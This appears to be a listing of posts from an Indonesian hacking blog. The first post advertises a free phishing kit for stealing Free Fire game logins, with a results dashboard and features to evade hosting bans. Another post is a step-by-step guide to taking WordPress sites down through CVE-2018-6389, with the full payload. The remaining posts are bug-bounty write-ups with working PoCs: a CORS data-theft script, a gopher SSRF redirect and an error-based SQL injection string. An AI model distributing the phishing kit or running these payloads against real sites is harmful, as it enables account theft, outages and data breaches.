Friday, November 13, 2020

Script Phising Free Fire 2020 Shopping Spree

 Script Phising Free Fire 2020 Shopping Spree



Halo sobat, karena banyak sekali yang minta saya untuk share script phising free fire maka sekarang saya akan share nih, sorry ya lama ga upload karena saya bingung mau upload apaan hadeh.

Jadi script phising Script Phising Free Fire 2020 Shopping Spree ini punya fitur :
  • Tanpa Email ( Jadi bisa dijalankan dimana aja )
  • Tidak mudah dibanned pihak hosting karena tidak menggunakan emai
  • Pre-True login ( Hanya email yang valid yang bisa ngisi )
  • Dilengkapi Result Dashboard

Jadi Script phising ini tidak menggunakan email untuk mengirim result, melainkan melihat langsung dari dashboard cara nya dengan membuka http://websitephisingmu.com/result.php > masukkan password yang telah di set di password.php > Berhasil, semua result akan ditampilkan...

Link Download : 
Disini

Script phising free fire, script phising 2020, script phising gratis, script phising gratis 2020

Read more

Saturday, January 25, 2020

By.U SOP Bypass | Cors Misconfiguration

Hasil gambar untuk by.u

Halo guys Rafli disini. Saya lagi semangat update nih hehehe. Kali ini saya mau sharing penemuan lagi nih dimana saya nemu CORS Misconfiguration di BY.U . Bagi yang belom tau By.u adalah provider kartu SIM yang tergolong baru dan milenial banget. byu ini anakan dari telkomsel guys silahkan kalo minat beli aja.

Ok Pertama tama kenapa saya langsung tulis write up ? karena cors misc ini adanya di API aplikasi android by.u maka dari itu kita tidak bisa melakukan real-world execution... karena cookie / barear headernya ada di aplikasi byu bukan di browser...

Jadi di api byu terdapat header :

Cache-Control: no-cache, private
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: authorization,Authorization,Content-Type,order_id,msisdn,Request-Origin

Kita bisa lihat mereka menambahkan header Allow-Origin: * yang artinya semua web bisa melakukan request ke api byu.. tapi gaes untuk melakukan csrf attack via cors misconfiguration ini dibutuhkan header Allow-Credentials: true. di byu ini gak ada headernya .. jadi kalo kita lakukan request menggunakan ajax xhr akan mendapatkan respon :
Access to XMLHttpRequest at 'http://api.byu.id/api/profile/1' from origin 'null' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

xhr/ajax tidak bisa mengirim request ke by.u karena hal tersebut. tapi taukah kalian ada cara lain nya loh. Kita bisa membypass SOP ini dengan Browser Cache. Hal ini pernah di coba oleh Hacker yang mengirim laporan ke hackerone :
SOP Bypass using Browser Cache

Nah sudah pada baca kan  ? Nah di byu ini kita bisa dapetin email dan nama serta gambar akun tersebut, caranya kita tinggal buat javascript yang melakukan request menggunakan fetch() ke api byu. server akan meloloskan request tersebut karena kita bisa pake credentials dari web tersebut menggunakan cache.

Code :

<html>
<script>
fetch('https://api.byu.id/api/profile/1')
  .then(response => response.json())
  .then(commits => alert("Email mu adalah : " + commits.data.email + "\r\nNama : " + commits.data.name));
</script>
</html>

Jika kalian mau test kalian buka by.u lalu ambil header authorization milik kalian ( sniff request nya ) lalu copy dan paste di modify header. Setelah itu kalian bisa buka html yang berisikan code tersebut dan jeng jeng Kalian bisa dapat deh...

Oke sekian itu aja dari saya untuk kali ini semoga kalian suka. dan untuk CS byu soory ya gaes udh adu argumen ketikan. thx yu.
Read more

Tuesday, January 21, 2020

Takedown Almost Any Website Using Wordpress

Hasil gambar untuk Wordpress Exokiut

Takedown Almost Any Website Used Wordpress

     Halo guys Welcome to my Website, sudah lama saya tidak publish Postingan lagi dikarenakan bingung mau Publish apa serta masalah internal diri saya sendiri. Terakhir kali saya upload tentang hacking yakni penemuan saya SSRF di ADFly yang bisa kalian baca di blog saya. Sebenarnya banyak pengalaman hunting bug saya yang belum saya tulis dikarenakan saya bingung mau nulis apa.


     Pada Artikel kali ini saya akan membahas tentang Takedown Website yang menggunakan CMS Wordpress. Takedown disini bukan berarti Takeover ya karena emang beda, maksudnya Takedown ya bikin web ini Down, istilah Populernya DDos. ya karena emang celahnya sendiri DoS ( Denial Of Service ) oh iya bagi kalian yang belom Tau apa itu DoS nih saya akan jelaskan 

Apa itu DoS ?
 English :
A denial-of-service (DoS) attack is a type of cyber attack in which a malicious actor aims to render a computer or other device unavailable to its intended users by interrupting the device's normal functioning. DoS attacks typically function by overwhelming or flooding a targeted machine with requests until normal traffic is unable to be processed, resulting in denial-of-service to addition users. A DoS attack is characterized by using a single computer to launch the attack.

Indonesia ( Menurut Pemahaman Bahasa inggris saya ) :
Denial Of Service adalah jenis serangan cyber dimana penyerang berusaha untuk membuat service / website itu tidak berfunsi, sehingga tidak bisa digunakan dan merugikan user maupun Pemilik website.

Nah Dos ini ada yang Distributed Denial Of Service atau dikenal dengan DDoS dan DoS biasa ( entah apa namanya )

DDoS :
DDoS ini merupakan serangan DoS dimana attacker mengirim paket Secara sekaligus dengan jumlah yang besar, sehingga jika website target tidak memiliki Filter / Pencegah pengunjung Invalid maka jumlah bandwitch yang dipakai server akan naik tentunya memory juga bisa kepakai banyak banget sehingga Cukup bahaya. Namun Ddos ini sudah banyak pencegahnya, pemilik website tinggal menggunakan Service seperti Cloudflare di website nya .

DoS Biasa :
DoS ini biasanya terjadi saat ente memasukan Jumlah data yang besar maupun data yang tidak bisa di baca server, contohnya : Pixel Flood attack. Contoh saja ketika saya memasukan input "%0t" ke server / sebuah form lalu ternyata server tersebut tidak menanggapi dan malah memberikan respon 503.. nah itu namanya DoS..

Bagi kalian yang penasaran tentang DoS Versi biasa ( Bukan DDoS ) maka kalian bisa baca :

Oke kita lanjut ke bahasan selanjutnya celah dimana kita bisa takedown Wordpress Account. Jadi bugnya merupakan Exploit CVE-2018-6389 dimana saat kita membuka load-scripts.php dengan memasukan payload ( Module js berjumlah banyak ) dan mengirimkan / membuka halaman tersebut secara terus menerus akan membuat website tersebut menggunakan banyak memmory, jika sampai 100% bisa saja web tersebut down.
How To :

1. Cari Target kalian
     Oke cari target kalian yang menggunakan wordpress, oh iya untuk pembuktian ada banyak website yang bisa menangkal ddos biasa ( Cloudflare sudah terpasang ) tetapi jika yang diddos load-scrips.php cloudflare akan membiarkannya masuk ( biasanya ), tapi ada juga web yang sudah di beri proteksi tambahan.
2. Coba Buka load-scripts.php
   Buka Load-scripts.php yang terletak di : domain.com/[path]/wp-admin/load-scripts.php jika saat dibuka blank maka kemungkinan masih bisa diakses , ciri ciri tidak vulnerable adalah saat diakses halaman menjadi 403 forbidden / not found.
3. Buat Tool DDOS
      Buat atau cari tools ddos, jangan ddos bocah termux bro cari yang multithreads. kalian bisa download di : Doser.py

4. Masukkan url+payloads ke tools ddos, kirim 1-2000 request.
   
Payloads:
wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9

5. jalankan tools ddos, sekarang cek apakah web sudah terasa loading nya lama / Down / 503 error.
  Biasanya Jika yang down cuma di user itu sendiri itu severitynya dianggap low dan jarang dianggap bug, tapi jika servernya down yang artinya semua orang gak bisa akses itu severitynya P4 , mau bilang p3 tapi gk mungkin p3..


6. Jika anda Whitehat hacker laporkan ke admin website dan dapatkan hadiah darinya !


Nah dari bug tersebut banyak loh yang sudah mendapat bounty. saya sendiri sudah dapet 50 ribu dari web sugeng.id serta laporan saya di hackerone.com sudah Triage yang artinya sedang ditindak lanjuti. masih gak percaya ? berikut hacker yang dapat bounty dari exploit ini :

1. MD15Ev : Informative but awarded $100

2. Pankaj Infosec : $700 Denial Of Service

Reward yang diberikan tergantung keputusan dan reputasi website tesebut, jika web besar bisa saja dapat $200+++ jika web kecil ya kecil kemungkinan hadiah nya besar wkwkwkwk. Okelah sekian itu aja yang bisa saya bagikan semoga kalian suka hehehe jangan lupa untuk tetap baca baca writeup lain biar ilmu makin bertambah salam heker ganteng.


Read more

Sunday, October 13, 2019

Server Dibobol Hacker ! Ratusan Ribu Akun Mobile Legends Berpotensi Dihack !

Server Dibobol Hacker ! Ratusan Ribu Akun Mobile Legends Berpotensi Dihack !


Halo Sobat Semua, Pada Artikel kali ini saya membawakan Breaking News Tentang Cyber Security nih. Mohon maaf bila saya jarang sekali Post Tentang hacking lagi karena saya Bingung mau ngetik apa. Nah kebetulan nih ada Berita Hangat, Simak Berikut ini. btw Teman saya ( Tepatnya abang abangan ) Kemarin malam Merasa akunnuya dipakai orang, padahal beliau tidak terkena phising sama sekali, beliau diajak ngechat sama si hacker panjang lebar, ternyata oh ternyata seperti ini alur hack nya.



Pada Tanggal 12 Oktober 2019 Pukul 7 Malam, Seorang hacker Berinisial Y**i K*******A (Nama Saya Samarkan) membuat Postingan / Status di wall Facebook beliau, Disana dijelaskan Dia berhasil Meretas Server Moonton sehingga dia berhasil mendapatkan Ratusan Ribu Akun Mobile Legends Siap Pakai. Dia Mengupload dan Mencoba menjual List akun tersebut ke Teman Facebooknya. Dalam waktu 5 jam Postingan beliau sudah dibagikan Lebih dari 200x oleh warganet facebook.

Ngomongin Peretasnya nih, Saya kasih clue nih Beliau merupakan Pembuat sekaligus Penjual Cheat Game Android Khusus nya Mobile Legends sejak tahun 2018 loh, Dengan Berbekal skill Coding, Reverse Enginnering, Recon, Pentesting Beliau Berhasil meretas Sistem Moonton. Tidak hanya itu, dia sudah diakui di Website Platinmods Semagai Cheat Maker nya.

Data yang didapatkan sang hacker merupakan Informasi sensitive mengenai Akun Player mobile legends, disana tertera beliau mendapatkan Login key, Nick name, server id, device id, dll. Dengan menggunakan info tersebut hanya tinggal mengedit file di folder root sehingga kita bisa memainkan akun tersebut.



Jangan salah ! Hacker ini ternyata sudah menemukan celah ini sejak lama, Dia pun sudah melaporkannya ke pihak Moonton, namun sesuai aturan Ethical Hacker bilamana tidak ada respon dari vendor atau perusahaan terkait selama 60 hari ( kurang lebih ) Hacker berhak MeRelease 0Day Security ke public, sama halnya seperti Bug vBulletin yang sempat trending beberapa minggu lalu.

Oleh karena itu, segera lah lakukan Pengamanan akun seperti Mencoba Login Logout akun, karena kemungkinan session / login key nya akan berubah sehingga dia tidak bisa mengaksesnya.

Cukup Sekian Artikel kali ini mohon maaf kalau belepotan intinya ini tuh masih fresh banget ya gays, makasih loh e.
Read more

Wednesday, June 26, 2019

Gain Adfly SMTP Access with SSRF via Gopher protocol

Support saya dengan kl1ck 1kl4n guys

Adfly Gain SMTP Access with SSRF via Gopher protocol
Halo Sobat Rafli Hax0r, pada artikel sebelumnya saya menemukan celah IDOR di ADFLY dan dihadiahi sebesar $100. Nah pada postingan kali ini saya mau share Penemuan saya diadfly ini sekitar 3 hari yang lalu, Bug ini merupakan bug SSRF yang severity nya lumayan tinggi. Btw Bug ini udh di fix ya jadi jangan dicoba gk bakal work ;v.

Kemungkinan besar bug ini terdapat di setiap url shortener yang mempunyai SMTP dan yg pastinya ngefetch data dari web tersebut. Oke lanjut kecerita, Awalnya saya gabut sampai saya kepikiran untuk nyari di adfly. Setelah 20 menit mencari dan tidak ketemu, saya berbicara dalam hati "wah kayaknya ni jika kita mau ngeshort url si adfly ngefetch Title dari web tersebut, munkin aja ini vuln SSRF".
Setelah itu saya pun mencoba memasukan protocol Gopher:// ternyata gagal alias ada filter dari adflynya.

Awalnya saya menggunakan Payload FASTCGI untuk RCE di Gopherus, namun tidak work karena adfly hanya mengambil TITLE web saja. saya Pun menggunakan payload SMTP menggunakan tool Gopherus Dan menggabungkannya kedalam script PHP yang akan saya upload ke hosting milik saya. code :

<?php
header('location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemailhaha%40gmail.com%0ADATA%0AFrom:adf%40ly%0ASubject:Test%0AMessage:test%0A.');
?>
Saya upload ke server dengan nama poc.php, btw ini buat ngebypass filter karena adfly hanya mengizinkan protocol http / https.

Setelah itu saya coba short http://serversaya.com/poc.php ke adfly, selang beberapa menit email dari adf@ly.adf.ly masuk ke email saya ( Seperti di SS berikut ).

Saya pun melaporkannya ke adfly, selang beberapa jam bug saya di terima adfly meminta bukti Original email dari saya, saya pun memberikannya. baru lah satu hari semenjak saya melapor bug tersebut diperbaiki, untuk masalah hadiah saya belum tau kapan tapi berdasarkan pengalaman saya baru dikasih 2 bulan setelah lapor.



Timeline :

- Minggu 23 Juni 2019 23:35 WIB = Bug Found & Reported
- Senin 24 Juni 2019 17:16 WIB = Triaged
- Senin 24 Juni 2019 22:34 WIB = Bug Fixed

Terimakasih sudah membaca writeup saya kali ini, maaf kalo berantakan hehe.

Read more

Friday, May 24, 2019

Dapet THR berkat Simple But Dengerous Bug [BugBounty - SQL injection ]

Hasil gambar untuk ad network

BugBounty - SQL injection - Halo sobat, pada kesempatan kali ini saya mau share nih pengalaman saya dapat THR dari satu adnetwork bernama Badhits. jadi waktu itu saya sedang buka group IndoXploit, disana bug hunter bernama noobsec menyarankan saya untuk mencari target adsnetwork di website adswiki.net. jadi saya pun mencari disitu, langsung saja saya filter berdasarkan bintang. Kebetulan badhits ini bintangnya 5 dan saya pun tertuju untuk melakukan pentest di web tersebut.

Setelah itu saya membuka web badhits.com dan disana hanya terdapat form login tanpa form register, ternyata badhits sendiri hanya membuka registrasi bagi yang menggunakan kode referal. contohnya refferal code milik saya Disini. Nah disini saya penasaran sama request get dari accesskey= apakah bisa / possible buat di sqli ? awalnya saya berfikir "ah gk mungkin ini vuln" karena udh sering saya mencoba test sqli di url refferal tapi hasilnya zonk.

Setelah itu saya akhirnya mencoba menambahkan Quote setelah accesskey=[idreferral].
https://badhits.com/register.php?accesskey=YHR5AGySRb'

Ternyata response nya "mysql error". dalam hati saya berfikir " wah vuln nih boleh juga.

akhirnya saya mencoba metode union based. ternyata saat mencari magic number tidak keluar alias error.

lalu saya mencoba metode Xpath Injection (Extractvalue) dan akhirnya bisa boise.

Setelah itu saya mencoba mendump 1 user sebagai bukti yaitu akun si admin badhits. ternyata passwordnya di hash, saya tidak tau itu hash jenis apa. akhirnya saya menemukan table pwreset yg ternyata berisi code untuk mereset password akun.
Dikarenakan metode extractvalue memiliki limit dalam mengeluarkan output, saya cari metode lain.
Saya pun gunakan Double Query Error Based SQL injection. jadi seperti ini :


https://badhits.com/register.php?accesskey=-YHR5AGySRb' and SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(QUERY SQL LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)%23

Saya pun mendapatkan akun admin, dan langsung melaporkan ke pihak admin.
Saya tanyakan apakah dia punya bug bounty program , cs nya pun menjawab :




Langsung saja setelah itu saya laporkan ke email tersebut. Satu jam setelah saya melaporkan hal tersebut, pihak badhits menindaklanjuti bug tersebut. 30 menit kemudian bug tersebut sudah diperbaiki.



Video Poc :




Setelah itu saya dikirim $65, walaupun kecil yang penting bisa buat beli baju lebaran hehehe.
Timeline :
19 Mei 2019 22:10 = Bug Reported
19 Mei 2019 23:38 = Triaged
20 Mei 2019 00:09 = Bug Fixed & Ask for payments
24 Mei 2019 00:08 = $65 send to amy paypal :D

Thx guys. 



 
Read more

Sunday, May 19, 2019

[BUGBOUNTY] Able to see everyone original url on ADFLY


Rafli hax0r - Pada Kesempatan kali ini saya mau membagikan temuan saya lagi nih. sebenarnya ini sudah saya temukan 3 minggu lalu, saya juga sudah membuatkan video write up di youtube, nah sekarang saya mau buat versi blog nya nih. sebelumnya kalian tau ga sih apa itu adfly ? yuk simak dulu.

Apa itu adfly ?
     Adfly adalah salah satu ads network terbesar yang ada diinternet, khususnya dalam urusan "URL shortener" . adfly sendiri banyak dipilih orang karena alasan withdraw mudah dan minimum saldonya rendah serta sudah terpercaya sejak lama.

nah sudah tau kan ? Yuk cekidot kita bahas masalah bugnya.

Saat itu saya sedang boring, kemudian pikiran saya tertuju kepada adfly karena ingin ngecek saldo saya di adfly. Setelah itu saya kepikiran "Ini kan website penghasil uang, bagaimana kalau saya cari bug disini, siapa tau dia ada sedikit hadiah buat saya ;v" langsung deh saya nyari selama 20 menit, sambil membuka Fiddler 4 . Tidak lama kemudian saya mendapatkan 2 bug sekaligus. namun yang saya laporkan hanya satu yakni Broken Access Control.

How To Reproduce :
1. Open https://adf.ly/publisher/getLink?token=&id=
2. Wajib Login terlebih dahulu.
3. Pergi ke intruder ( brute forcer ) submit ke param id dari 1 - 1000
4. Maka Kita bisa tau Original url dari shortened url tersebut.

Video PoC :
`



Setelah itu saya melaporkan keadmin.  2 hari setelah report saya mendapat tanggapan dan dijanjikan hadiah. tapi hingga sekarang hadiah tersebut masih khayalan semata :(. Baiklah terimakasih sudah berkunjung semoga kalian sehat selalu amin ya rabb. semoga Bulan Puasa kali ini penuh berkah.

Timeline :
27 April 2019 = Reported This Bug
29 April 2019 = Triaged, after +- 10 minutes Bug Fixed (Dijanjikan Hadiah)
Update : Sudah Dikasih Reward berupa $100


Read more